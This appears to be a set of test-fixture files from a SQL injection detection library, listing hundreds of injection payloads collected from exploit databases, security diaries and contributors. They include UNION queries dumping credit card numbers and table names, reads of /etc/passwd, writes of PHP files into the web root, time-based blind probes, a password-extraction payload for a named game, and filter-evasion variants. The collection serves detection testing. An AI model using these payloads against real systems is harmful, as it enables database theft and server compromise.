#-1%23%20union%20%20%20%0D%0A%0D%0A%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%28%28%28%28%20%28%28%28%28%20%20%20%20%20%20%20%20%20%20%20%28%28%23fdafdsa%0D%0A%28select%23%28table_name%29%20from%20information_schema.tables%20limit%201%2C1%29%29%29%29%29%29%29%29%29%29%29
#-1%23%0D%0A%20union%20%20%20%0D%0A%0D%0A%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%28%28%28%28%20%28%28%28%28%20%20%20%20%20%20%20%20%20%20%20%28%28%23fdafdsa%0D%0A%28select%23%28table_name%29%20from%20information_schema.tables%20limit%201%2C1%29%29%29%29%29%29%29%29%29%29%29
#-1%23%0D%0A%23%20union%20%20%20%0D%0A%0D%0A%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%28%28%28%28%20%28%28%28%28%20%20%20%20%20%20%20%20%20%20%20%28%28%23fdafdsa%0D%0A%28select%23%28table_name%29%20from%20information_schema.tables%20limit%201%2C1%29%29%29%29%29%29%29%29%29%29%29
#-1%23%0D%0A%23%20union%20%20%20%0D%0Aun%0D%0A%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%28%28%28%28%20%28%28%28%28%20%20%20%20%20%20%20%20%20%20%20%28%28%23fdafdsa%0D%0A%28select%23%28table_name%29%20from%20information_schema.tables%20limit%201%2C1%29%29%29%29%29%29%29%29%29%29%29
-1%23%0D%0A%0D%0Aunion
-1%23%0D%0A%0D%0Aunion%20%23
-1%23%0D%0A%0D%0Aunion%20%23%0D%0A%23
-1%23%0D%0Aunion%20%23%0D%0A%23
-1%23union%20%23%0D%0Aunion
-1%23union%20%23%23%0D%0Aunion
-1%23union%20%23%23%0D%0A--%0D%0Aunion
#-1%23union%20%23%23%0D%0A---%0D%0Aunion
-1%23union%20%23%23%0D%0A--%0D%0A--%0D%0A%0D%0Aunion
-1%23unn%20%23%23%0D%0A--%0D%0A--%0D%0A%0D%0Aunion
-1%23union%20%23%23%0D%0A--%0D%0A--%0D%0A%0D%0Aunion
-1%23union%20%23%23%0D%0A--%0D%0A--%0D%0A%0D%0Aunion%0D%0A%23
-1%23union%20%23%23%0D%0A--%0D%0A--%0D%0A%0D%0Aunion%0D%0A%23rfae%0D%0A%23%23
-1%23union%20%23%23%0D%0A--%0D%0A--%0D%0A%0D%0Aunion%0D%0A%23rfae%0D%0A%23%23union
-1%23union%20%23%23%0D%0A--%0D%0A--%0D%0A%23%0D%0Aunion%0D%0A%23rfae%0D%0A%23%23union
-1%23union%20%23%23%0D%0A--%0D%0A--%0D%0A%23%0D%0Aunion%23%0D%0A%23rfae%0D%0A%23%23union
-1%23union%20%23%23%0D%0A--%0D%0A--%0D%0A%23%0D%0Aunion%23--%0D%0A%23rfae%0D%0A%23%23union
-1%23union%20%23%23%0D%0A--%0D%0A--%0D%0A%23--%0D%0Aunion%23--%0D%0A%23rfae%0D%0A%23%23union
-1%23union%20%23%23%0D%0A--%0D%0A--%0D%0A%23/--%0D%0Aunion%23--%0D%0A%23rfae%0D%0A%23%23union
-1%23union%20%23%23%0D%0A--%0D%0A--%0D%0A%23/--%0D%0A/%2A%2A/union%23--%0D%0A%23rfae%0D%0A%23%23union
-1%23union%20%23%23%0D%0A%23/%0D%0A/%2A%2A/union%23--
-1%23union%20%23%23%0D%0A/1/%2A%2A/union%23--
-11/1/%2A%2A/union%23--
-1%0D%0A/1/%2A%2A/union%23--
-1/1/%2A%2A/union%23--
1/1/%2A%2A/union%23--
-11/1/%2A%2A/union%23--
-1%0D%0A/1/%2A%2A/union
-1%0D%0A/1/%2A%2A/union
-1%0D%0A/1/%2A%2A/union%23
-1%0D%0A/1/%2A%2A/union%23--
-1%0D%0A/1/%2A%2A/union
1/1/%2A%2A/union
%0D%0A1/1/%2A%2A/union
0-%0D%0A1/1/%2A%2A/union
0x1-%0D%0A1/1/%2A%2A/union
0x1%20-%0D%0A1/1/%2A%2A/union
test%27-%0D%0A1/1/%2A%2A/union%20select
test%27-%0D%0A1/1/%2A%2A/union%28select
test%27-%0D%0A1/1/%2A%2A/union%28select%20table%29
test%27-%0D%0A1/1/%2A%2A/union%28select%20table_name%20from%20information_schema.tables%20limit%201%2C1%29
test%27-%0D%0A1/1/%2A%2A/union%28select%20table%29
test%27-%0D%0A1/1/%2A%2A/union%28select%20table_name%20from%20information_schema.tables%20limit%201%2C1%29
test%27-1/1/%2A%2A/union%28select%20table_name%20from%20information_schema.tables%20limit%201%2C1%29
test%27-%0D%0A1/1/%2A%2A/union%28select%20table_name%20from%20information_schema.tables%20limit%201%2C1%29
test%27-%20%40version%20union%28select%20table_name%20from%20information_schema.tables%20limit%201%2C1%29
1-%20%40version%20union%28select%20table_name%20from%20information_schema.tables%20limit%201%2C1%29
0/%2A%2A/union/%2A%2150000select%2A/table_name%60foo%60/%2A%2A/
0/%2A%2A/union/%2A%2150000select%2A/table_name%60foo%60/%2A%2A/
0-select/%2A%211%20union%20select%20version%28%29%2A/from%20test%3B
%27select/%2A%211%20union%20select%20version%28%29%2A/from%20test%3B
%27-select/%2A%211%20union%20select%20version%28%29%2A/from%20test%3B
-1.select/%2A%211%20union%20select%20version%28%29%2A/from%20test%3B
0/%2A%2A/union/%2A%2150000select%2A/table_name%60foo%60/%2A%2A/
select%20load_file%28%27/asd/asd%27%29
select%20load_file%28%27/asd/asd%27%29
select%20load_file%28%27/asd/asd%27%29
%27%20into%20outfile%20%27/var/www/aa.php
%27%20into%20outfile%20%27/var/www/aa.php
%27%20into%20outfile%20%27/var/www/aa.php%27--
%27%20into%20outfile%20%27/var/www/aa.php%27--a-
%27%20into%20outfile%20%27/var/www/aa.php%27--a-
%27%20into%20outfile%20%27/var/www/aa.php%27%23
%27%20into%20outfile%20%0D%0A%27/var/www/aa.php%27
select%20load_file%28%27/asd/asd%27%29
1%20into%20outfile%20%27asd%27%0D%0A
1%20into%20outfile%20%27asd%27%0D%0A
%27%20into%20outfile%20%27/var/www/aa.php
%27%20into%20outfile%20%27/var/www/aa.php%27--a-
1%20into%20outfile%20%27asd%27%0D%0A
%40%D1%841%D1%841%D1%841%D1%841%D1%841%D1%841%D1%841%20%20union%20select%20
%27%20into%20outfile%20%27/var/www/aa.php
%27%20into%20outfile%20%27/var/www/aa.php%27--a-
1%20into%20outfile%20%27asd%27%0D%0A
%40%D1%841%D1%841%D1%841%D1%841%D1%841%D1%841%D1%841%20%20union%20select%20
%27-%40%D1%841%20union%20select%20us3rs%20from%20table1
%40%D1%841%D1%841%D1%841%D1%841%D1%841%D1%841%D1%841%20%20union%20select%20a%20from%20b
1a%20union%20%28select%20id%20from%20users%20limit%201%2C1%29
1a%20union%20%28select%20id%20from%20users%20limit%201%2C1%29
union%20%28select%20id%20from%20users%20limit%201%2C1%29
1%20into%20outfile%20%27asd%27%0D%0A
%27%20into%20outfile%20%27/var/www/aa.php%27--a-
%27union%20select%20
%27union%20select
%22union%20select
1%20union%20select
%40a%20union%20select

View file

@ -0,0 +1,4 @@
# various things for http://www-01.ibm.com/support/knowledgecenter/SSGU8G_11.50.0/com.ibm.sqls.doc/ids_sqs_1526.htm
#
UNION ALL SELECT FileToClob("/etc/passwd", "server")::html,0
UNION ALL SELECT FileToBlob("/etc/passwd", "server")::html,0

View file

@ -0,0 +1,20 @@
# solar empire attack
# http://www.exploit-db.com/exploits/4078/
# these use the multiple insert syntax
# INSERT INTO FOO VALUES (1, 'foo'), (2, 'bar) ....
# $sql = "INSERT INTO FOO VALUES (1, '$DIRTY')"
# $sql = "INSERT INTO FOO VALUES (1, '$DIRTY')"
# $sql = "INSERT INTO FOO VALUES ('$DIRTY', 2)"
F%2A%2A%2A%2A%27%29%2C%281%2C2%2C3%2C4%2C5%2C%28SELECT+IF+%28%28ASCII%28SUBSTRING%28se_games.admin_pw%2C1%2C1%29%3D%271%27%29+%26+1%2C+benchmark%2820000%2CCHAR%280%29%29%2C0%29+FROM+se_games%29%29%2F%2A
# numeric version
999%29%2C%281%2C2%2C3%2C4%2C5%2C%28SELECT+IF+%28%28ASCII%28SUBSTRING%28se_games.admin_pw%2C1%2C1%29%3D%271%27%29+%26+1%2C+benchmark%2820000%2CCHAR%280%29%29%2C+0%29+FROM+se_games%29%29%2F%2A
# arg switch
F%2A%2A%2A%2A%27%2C+2%29%2C%281%2C2%2C3%2C4%2C5%2C%28SELECT+IF+%28%28ASCII%28SUBSTRING%28se_games.admin_pw%2C1%2C1%29%3D%271%27%29+%26+1%2C+benchmark%2820000%2CCHAR%280%29%29%2C+0%29+FROM+se_games%29%29%2F%2A
# arg switch + numeric
999%2C+%27CRAP%27%29%2C%281%2C2%2C3%2C4%2C5%2C%28SELECT+IF+%28%28ASCII%28SUBSTRING%28se_games.admin_pw%2C1%2C1%29%3D%271%27%29+%26+1%2C+benchmark%2820000%2CCHAR%280%29%29%2C+0%29+FROM+se_games%29%29%2F%2A
999%2C+1%29%2C%281%2C2%2C3%2C4%2C5%2C%28SELECT+IF+%28%28ASCII%28SUBSTRING%28se_games.admin_pw%2C1%2C1%29%3D%271%27%29+%26+1%2C+benchmark%2820000%2CCHAR%280%29%29%2C0%29+FROM+se_games%29%29%2F%2A

View file

@ -0,0 +1,8 @@
# http://isc.sans.edu/diary.html?storyid=12127
189%27%29%29%2F%2A%2A%2For%2F%2A%2A%2F1%3D%40%40version------snip----
189%29%2F%2A%2A%2For%2F%2A%2A%2F1%3D%40%40version--------snip----
189%2F%2A%2A%2For%2F%2A%2A%2F1%3D%40%40version%29%29------snip----
189%27%2F%2A%2A%2For%2F%2A%2A%2F1%3D%40%40version%29------snip----
# http://isc.sans.edu/diary.html?storyid=11011
999999.9+UNION+ALL+SELECT+0x31303235343830303536%2C0x31303235343830303536--

View file

@ -0,0 +1,7 @@
#
# Yong Deng reported 2016-10-20
#
# Tests that "left" is treated as a function
#
# http://www.w3resource.com/mysql/string-functions/mysql-left-function.php
1'and left(database(),2)>'sa'--+

View file

@ -0,0 +1,640 @@
#
# Misc collected attacks from the wild and beyond....
#
SO_BUY+AND+IF%281%3D1%2CBENCHMARK%281589466%2CMD5%280X41%29%29%2C0%29
SO_BUY%3B+IF+%281%3D1%29+WAITFOR+DELAY+%2700%3A00%3A01%27--
SO_BUY+AND%28SELECT+1+FROM%28SELECT+COUNT%28%2A%29%2CCONCAT%28%28SELECT+%28SELECT+CONCAT%280X7E%2C0X27%2CDATABASE%28%29%2C0X27%2C0X7E%29%29+FROM+%60INFORMATION_SCHEMA%60.TABLES+LIMIT+0%2C1%29%2CFLOOR%28RAND%280%29%2A2%29%29X+FROM+%60INFORMATION_SCHEMA%60.TABLES+GROUP+BY+X%29A%29+AND+1%3D1
SO_BUY+AND%28SELECT+1+FROM%28SELECT+COUNT%28%2A%29%2CCONCAT%28%28SELECT+%28SELECT+CONCAT%280X7E%2C0X27%2CUNHEX%28HEX%28CAST%28DATABASE%28%29+AS+CHAR%29%29%29%2C0X27%2C0X7E%29%29+FROM+%60INFORMATION_SCHEMA%60.TABLES+LIMIT+0%2C1%29%2CFLOOR%28RAND%280%29%2A2%29%29X+FROM+%60INFORMATION_SCHEMA%60.TABLES+GROUP+BY+X%29A%29+AND+1%3D1
PHPX+AND+1%3D1+AND+XX%3DX
PHPX+AND+CHAR%28124%29+USER+CHAR%28124%29%3D0+AND+XX%3DX
SO_BUY%3B+IF+%281%3D1%29+WAITFOR+DELAY+%2700%3A00%3A01%27--%27
SO_BUY%27%3B+IF+%281%3D1%29+WAITFOR+DELAY+%2700%3A00%3A01%27--
materials'%20and%201=1%20and%20''='
materials'%20and%201=2%20and%20''='
1'%20and%20char(124)%2Buser%2Bchar(124)=0%20and%20'%25'='
-999.9'%20UNION%20ALL%20SELECT%200x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536%20and%20'x'='x
# not sql
#5000224%27%20UNION%20user_id%3E0--
-5000224%27%20UNION%20select%20user_id%20from%20users%20where%20user_id%3E0//
# not sql
#-5000224%27%20UNION%20user_id%3E0--
5000224%27%20or%201=1--
8+and+1=1--
8+order+by+1--
8-999.9+union+select+0
9-999.9+union+select+0--
6334588%00%27%7C%7CSLEEP%283%29%26%26%271
6334588%20AND%20BENCHMARK%282999999%2CMD5%28NOW%28%29%29%29
6334588%26%26SLEEP%283%29
6334588%27%20AND%20BENCHMARK%282999999%2CMD5%28NOW%28%29%29%29%20AND%20%271
6334588%27%20AND%20SLEEP%283%29%20AND%20%271
6402272%27%20%61%6E%64%20%27%36%27%3D%27%356402272%27%20%61%6E%64%20%27%36%27%3D%27%366444930%20%61%6E%64%20%36%3D%35
6444930%20%61%6E%64%20%36%3D%36
6444930%27%20%61%6E%64%20%27%36%27%3D%27%35
6444930%27%20%61%6E%64%20%27%36%27%3D%27%36
FOO%29%29+AND+UPDATEXML%281025%2CCONCAT%280X2E%2C0X3A7676693A%2C%28SELECT+%28CASE+WHEN+%281025%3D1025%29+THEN+1+ELSE+0+END%29%29%2C0X3A7471773A%29%2C7573%29+AND+%28%283045%3D3045
1+%2B+%28SELECT+6744+FROM+DUAL+WHERE+3176%3D3176+AND+3761%3D5879%23+%29
1234.5%29+ORDER+BY+1
FOO%2C%28SELECT+%28CASE+WHEN+%284831%3D4831%29+THEN+1+ELSE+1%2F%28SELECT+0%29+END%29%29
FOO%29%3B+IF%28%286681%3D9099%29%2CSELECT+6681%2CDROP+FUNCTION+CGIQ%29%3B%23+AND+%284596%3D4596
FOO%2C%28SELECT+%28CASE+WHEN+%284763%3D4974%29+THEN+FOO+ELSE+4763%2A%28SELECT+4763+FROM+MYSQL.DB%29+END%29%29
FOO%29+WHERE+9060%3D9060+AND+UPDATEXML%281025%2CCONCAT%280X2E%2C0X3A7676693A%2C%28SELECT+%28CASE+WHEN+%281025%3D1025%29+THEN+1+ELSE+0+END%29%29%2C0X3A7471773A%29%2C7573%29
FOO%29%29%29+AND+3787%3DCONVERT%28INT%2C%28CHAR%2858%29%2BCHAR%28118%29%2BCHAR%28118%29%2BCHAR%28105%29%2BCHAR%2858%29%2B%28SELECT+%28CASE+WHEN+%283787%3D3787%29+THEN+CHAR%2849%29+ELSE+CHAR%2848%29+END%29%29
FOO+%2B+%28SELECT+9350+WHERE+8850%3D8850+AND+3963%3D4777--++%29
FOO%29+AND+4499%3D8923%23
FOO%2CIIF%282510%3D9436%2CFOO%2C1%2F0%29
FOO%29%29%3B+IF%28%288708%3D3788%29%2CSELECT+8708%2CDROP+FUNCTION+RIHR%29%3B%23+AND+%28%286571%3D6571
FOO%29%29%29%3B+IF%28%289256%3D5702%29%2CSELECT+9256%2CDROP+FUNCTION+IRII%29%3B%23+AND+%28%28%283502%3D350
%28SELECT+2299%3D%28%27%3AJQA%3A%27%7C%7C%28SELECT+CASE+2299+WHEN+2299+THEN+1+ELSE+0+END+FROM+RDB%24DATABASE%29%7C%7C%27%3AUGJ%3A%27%29%29
%28SELECT+2811+FROM%28SELECT+COUNT%28%2A%29%2CCONCAT%280X3A6A71613A%2C%28SELECT+%28CASE+WHEN+%282811%3D2811%29+THEN+1+ELSE+0+END%29%29%2C0X3A75676A3A%2CFLOOR%28RAND%280%29%2A2%29%29X+FROM+INFORMATION_SCHEMA.CHARACTER_SETS+GROUP+BY+X%29A%29
FOO%2CEXTRACTVALUE%288571%2CCONCAT%280X5C%2C0X3A7676693A%2C%28SELECT+%28CASE+WHEN+%288571%3D8571%29+THEN+1+ELSE+0+END%29%29%2C0X3A7471773A%29%29
%28CASE+WHEN+4518%3D5617+THEN+1+ELSE+NULL+END%29
FOO%29%29%3B+SELECT+PG_SLEEP%285%29%3B--
FOO%29%29%29%3B+BEGIN+DBMS_LOCK.SLEEP%285%29%3B+END%3B--+AND+%28%28%288410%3D8410
FOO%29%29+WAITFOR+DELAY+%270%3A0%3A5%27--+AND+%28%282114%3D2114
FOO%29%29%29+WAITFOR+DELAY+%270%3A0%3A5%27--+AND+%28%28%281285%3D1285
FOO+WAITFOR+DELAY+%270%3A0%3A5%27--
1+order+by+1
FOO%2C%28CAST%28CHR%2858%29%7C%7CCHR%28118%29%7C%7CCHR%28118%29%7C%7CCHR%28105%29%7C%7CCHR%2858%29%7C%7C%28SELECT+%28CASE+WHEN+%281861%3D1861%29+THEN+1+ELSE+0+END%29%29%3A%3ATEXT%7C%7CCHR%2858%29%7C%7CCHR%28116%29%7C%7CCHR%28113%29%7C%7CCHR%28119%29%7C%7CCHR%2858%29+AS+NUMERIC%29%29
%28SELECT+GENERATE_SERIES%28FOO%2CFOO%2CCASE+WHEN+%289255%3D9830%29+THEN+1+ELSE+0+END%29+LIMIT+1%29
-999.9+UNION+ALL+SELECT+%27R3DM0V3_HVJ_INJECTION%27%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--
999999.9+UNION+ALL+SELECT+%27R3DM0V3_HVJ_INJECTION%27%2CNULL--
-999.9+UNION+ALL+SELECT+%27R3DM0V3_HVJ_INJECTION%27--
-999.9+UNION+ALL+SELECT+%28SELECT+CAST%28CHAR%28114%29%2BCHAR%2851%29%2BCHAR%28100%29%2BCHAR%28109%29%2BCHAR%2848%29%2BCHAR%28118%29%2BCHAR%2851%29%2BCHAR%2895%29%2BCHAR%28104%29%2BCHAR%28118%29%2BCHAR%28106%29%2BCHAR%2895%29%2BCHAR%28105%29%2BCHAR%28110%29%2BCHAR%28106%29%2BCHAR%28101%29%2BCHAR%2899%29%2BCHAR%28116%29%2BCHAR%28105%29%2BCHAR%28111%29%2BCHAR%28110%29+AS+NVARCHAR%284000%29%29%29%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--
999.9+UNION+ALL+SELECT+%28SELECT+CAST%28CHAR%28114%29%2BCHAR%2851%29%2BCHAR%28100%29%2BCHAR%28109%29%2BCHAR%2848%29%2BCHAR%28118%29%2BCHAR%2851%29%2BCHAR%2895%29%2BCHAR%28104%29%2BCHAR%28118%29%2BCHAR%28106%29%2BCHAR%2895%29%2BCHAR%28105%29%2BCHAR%28110%29%2BCHAR%28106%29%2BCHAR%28101%29%2BCHAR%2899%29%2BCHAR%28116%29%2BCHAR%28105%29%2BCHAR%28111%29%2BCHAR%28110%29+AS+NVARCHAR%284000%29%29%29%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--
999999.9+UNION+ALL+SELECT+CHR%28114%29%7C%7CCHR%2851%29%7C%7CCHR%28100%29%7C%7CCHR%28109%29%7C%7CCHR%2848%29%7C%7CCHR%28118%29%7C%7CCHR%2851%29%7C%7CCHR%2895%29%7C%7CCHR%28104%29%7C%7CCHR%28118%29%7C%7CCHR%28106%29%7C%7CCHR%2895%29%7C%7CCHR%28105%29%7C%7CCHR%28110%29%7C%7CCHR%28106%29%7C%7CCHR%28101%29%7C%7CCHR%2899%29%7C%7CCHR%28116%29%7C%7CCHR%28105%29%7C%7CCHR%28111%29%7C%7CCHR%28110%29--
CAT1_GALLERY_1+UNION+ALL+SELECT+%28SELECT+CAST%28CHAR%28114%29%2BCHAR%2851%29%2BCHAR%28100%29%2BCHAR%28109%29%2BCHAR%2848%29%2BCHAR%28118%29%2BCHAR%2851%29%2BCHAR%2895%29%2BCHAR%28104%29%2BCHAR%28118%29%2BCHAR%28106%29%2BCHAR%2895%29%2BCHAR%28105%29%2BCHAR%28110%29%2BCHAR%28106%29%2BCHAR%28101%29%2BCHAR%2899%29%2BCHAR%28116%29%2BCHAR%28105%29%2BCHAR%28111%29%2BCHAR%28110%29+AS+NVARCHAR%284000%29%29%29%2CNULL--
1 - ORD('A')
TRUE DIV(SELECT ORD(LEFT
TRUE DIV(SELECT (ORD(LEFT
TRUE DIV(SELECT ((ORD(LEFT
1 DIV(SELECT ORD(LEFT
1 DIV(SELECT (ORD(LEFT
0 UNION SELECT (1),2,3
1 AND (SELECT TOP 10 USERNAME FROM USERS);
1 AND SELECT 1 FROM T.TRANS_DATE -- 1
1 AND (SELECT 1 FROM T.TRANS_DATE -- 1
1 GROUP BY 1 HAVING 1 = 1
1 GROUP BY 1 HAVING '1' = 1
1 GROUP BY 1,TRANSID,ACCOUNTID HAVING 1=1
1 AND SELECT TOP 10 USERNAME FROM USERS -- 1
1001 union(select userid, ccnumber, '3', '4' from credit_cards)
1001 union((select userid, ccnumber, '3', '4' from credit_cards))
1001 union/*/**/*/select userid, ccnumber, '3', '4' from credit_cards
1001 or 'A' = 'B' union select userid, ccnumber, '3', '4' from credit_cards
'6334588?'||SLEEP(3)&&'1
1001*/*!50000(1)union*/all(select 1,ccnumber,3,4 from credit_cards)
1001*/*!50000(1)union select 1,ccnumber,load_file('/etc/passwd'),4 from credit_cards*/
(1001)union select-1,ccnumber,3,4 from credit_cards
(1001)union select (1),ccnumber,3,4 from credit_cards
(1001)union select @a,ccnumber,3,4 from credit_cards
1001-\N%0aunion select 1,ccnumber,3,4 from credit_cards
1001 sounds like '1001' union select 1,ccnumber,3,4 from credit_cards
1001-'text' union select 1,ccnumber,3,4 from credit_cards
1001%2b@a union select 1,load_file('/etc/passwd'),3,4 from credit_cards
((1001)-1) union select 1,2,3,4 from credit_cards
1001'-@a union select 1,2,3,4 from credit_cards-- -
'1001'-@a union select 1,2,3,4 from credit_cards
((1001)-1) union select 1,2,3,4 from credit_cards
1001 rlike(-1)union select 1,2,3,4 from credit_cards
## 1001 ----1 union select 1,2,3,4 from credit_cards
1001 or 'foo' union select 1,2,3,4 from credit_cards
1001 and @a union select 1,2,3,4 from credit_cards
1001 like @a-1 union select 1,2,3,4 from credit_cards
1001-\N-\N union select 1,2,3,4 from credit_cards
(1001-\N-\N) union select 1,2,3,4 from credit_cards
(1001-\N)-\N union select 1,2,3,4 from credit_cards
1001-\N union select 1,2,3,4 from credit_cards
1001-true union select 1,2,3,4 from credit_cards
(1001-true) union select 1,2,3,4 from credit_cards
(1001-'1') union select 1,2,3,4 from credit_cards
(1001-@version) union select 1,2,3,4 from credit_cards
1-(1001-true) union select 1,2,3,4 from credit_cards
1001-false-false union select 1,2,3,4 from credit_cards
1001-false-NULL union select 1,2,3,4 from credit_cards
1001 rlike(1-NULL)union select 1,2,3,4 from credit_cards
1001 rlike(1-(NULL))union select 1,2,3,4 from credit_cards
(1)-'1' union select 1,2,3,4 from credit_cards
(1)-@version union select 1,2,3,4 from credit_cards
(@version)-@version union select 1,2,3,4 from credit_cards
(@version)-1 union select 1,2,3,4 from credit_cards
(@version)-'1' union select 1,2,3,4 from credit_cards
@version-@version union select 1,2,3,4 from credit_cards
@version-1 union select 1,2,3,4 from credit_cards
@version-'1' union select 1,2,3,4 from credit_cards
('1')-'1' union select 1,2,3,4 from credit_cards
1001 rlike(-1-1)union select 1,2,3,4 from credit_cards
1001 rlike(1-1)union select 1,2,3,4 from credit_cards
1001 rlike(@version)union select 1,2,3,4 from credit_cards
1001 rlike(@version-1)union select 1,2,3,4 from credit_cards
1001 rlike(1-@version)union select 1,2,3,4 from credit_cards
1001 rlike('1')union select 1,2,3,4 from credit_cards
# vv new variations 2013-04-10 nickg vv
1001 RLIKE ((1)) UNION SELECT 1 FROM CREDIT_CARDS
1001 RLIKE ((-1)) UNION SELECT 1 FROM CREDIT_CARDS
1001 RLIKE ((-"1")) UNION SELECT 1 FROM CREDIT_CARDS
1001 RLIKE (-(1)) UNION SELECT 1 FROM CREDIT_CARDS
1001 RLIKE (-(-1)) UNION SELECT 1 FROM CREDIT_CARDS
# http://vagosec.org/2013/04/mysql-implicit-type-conversion/
# a'+'b encoded is a%27%2B%27b
a%27%2B%27b
' OR 1='1
# new variations
X' != 'Y' = 0 = '1
X' = 'X' = 0 = '1
X' = 'X' = 'X' = 0 = '1
X' - 'Y' - 0 = '1
# part of parameter pollution
1) FROM USERS WHERE USERNAME=
# nest pgsql mssql comments
1/* /*/ */ */ or 1=1-
1/* /* / */ */ or 1=1-
# small sqli
1--
1 --
1 --
1/*
1 /*
1 /*
1*1--
1 * 1--
1 * 1 --
1*1/*
1 * 1/*
1 * 1 /*
1 * 1 /*
@version--
@@version--
@version --
@version /*
@version/*
# thanks @d0znpp
(select id from users limit 1,1)
(select id-0 from users limit 1,1)
# known bypass.. for now!
(select id,id,id,id from users limit 1,1)
# some variations
'1' union (select id from users limit 1,1)
1 union (select id from users limit 1,1)
xxx union (select id from users limit 1,1)
@version union (select id from users limit 1,1)
'1' union (select 1 from users limit 1,1)
1 union (select 1 from users limit 1,1)
xxx union (select 1 from users limit 1,1)
@version union (select 1 from users limit 1,1)
'1' union (select xxx from users limit 1,1)
1 union (select xxx from users limit 1,1)
xxx union (select xxx from users limit 1,1)
@version union (select xxx from users limit 1,1)
'1' union (select 's' from users limit 1,1)
1 union (select 's' from users limit 1,1)
xxx union (select 's' from users limit 1,1)
@version union (select 's' from users limit 1,1)
# thanks @LightOS
-1 union(((select table_name from information_schema.tables limit 1,1)))
'1' union(((select table_name from information_schema.tables limit 1,1)))
@foo union(((select table_name from information_schema.tables limit 1,1)))
id union(((select table_name from information_schema.tables limit 1,1)))
# and again @LightOS
test'-1/1/**/union(select table)
test'-1 union(select table)
test'-@version union (select table)
test'-'xyz' union (select table)
1- @version union(select table_name from information_schema.tables limit 1,1)
1- 'xxx' union(select table_name from information_schema.tables limit 1,1)
1- union(select table_name from information_schema.tables limit 1,1)
@version - @version union(select table_name from information_schema.tables limit 1,1)
@version- 'xxx' union(select table_name from information_schema.tables limit 1,1)
@version - 5 union(select table_name from information_schema.tables limit 1,1)
#
1 into outfile 'asd'
1 into outfile 'asd'--
'1' into outfile 'asd'
'1' into outfile 'asd' --
@version into outfile 'asd'
@version into outfile 'asd' --
1 into outfile ('asd')
'1' into outfile ('asd')
@version into outfile ('asd')
1 into outfile substring('asd', 10, 1)
'1' into outfile substring('asd', 10, 1)
@version into outfile substring('asd', 10 1)
1 into outfile (substring('asd', 10, 1))
'1' into outfile (substring('asd', 10, 1))
@version into outfile (substring('asd', 10 1))
%28select+substr%0D%0A%28login%0D%0A%0D%0A%29%0D%0Afrom+users+limit+1%2C1%29
union%20%28select+id+from+users+limit+1%2C1%29
#
# This is not valid SQL but designed to force a syntax error
# http://www.modsecurity.org/testphp.vulnweb.com/listproducts.php?cat=1%0Aand+current_user=notthere()
1%0Aand+current_user=notthere()
1%0Aand+current_user=1
1%0Aand+current_user=@version
1%0Aand+current_user='junk'
1%0Aand+current_user=foo
1--%0a+union%0C-%28%20select+table_name+from+information_schema.tables+limit+1%2C1%29
1'--%0a+union%0C-%28%20select+table_name+from+information_schema.tables+limit+1%2C1%29
@version--%0a+union%0C-%28%20select+table_name+from+information_schema.tables+limit+1%2C1%29
-.1a%20union%20%28select+id+from+users+limit+1%2C1%29
case 1 when 2 then 2 end
case sin(1) when 2 then 2 end
case '1' when 2 then 2 end
case 1 when 's' then 2 end
case when 2 then 3 end
case when 's' then 3 end
case when f(1) then 3 end
-1 union select table_name asda from information_schema.tables
-1 union select table_name "asda" from information_schema.tables
-1 union select table_name `asda` from information_schema.tables
-1 union select table_name as asda from information_schema.tables
-1 union select table_name as "asda" from information_schema.tables
-1 union select table_name as `asda` from information_schema.tables
a'and(select(binary(/*!system_user()*/)))like'reading%25
-1 union select @``"", table_name from information_schema.tables
'foo' union select @``"", table_name from information_schema.tables
@version union select @``"", table_name from information_schema.tables
select @version foo
select @version "foo"
select @version foo -- junk
select @version "foo" -- junk
$$pgsql evade$$ union select * from foo
$foo$pgsql evade$foo$ union select * from foo
u&'pgsql evade' union select * from foo
U&'pgsql evade' union select * from foo
U&'pgsql evade' uescape '!' union select * from foo
_latin1'foo' union select * from foo
_LATIN7'foo' union select * from foo
_utf8'foo' union select * from foo
REAL 1 union select * from foo
1::REAL union select * from foo
1::REAL::REAL union select * from foo
-1 union select @``"", table_name from information_schema.tables
!~1 union select table_name from information_schema.tables
-1 union select @a`from 1`, table_name from information_schema.tables
version() union select table_name from information_schema.tables
-1 LOCK IN SHARE MODE UNION SELECT table_name from information_schema.tables
1 is unknown union select table_name from information_schema.tables
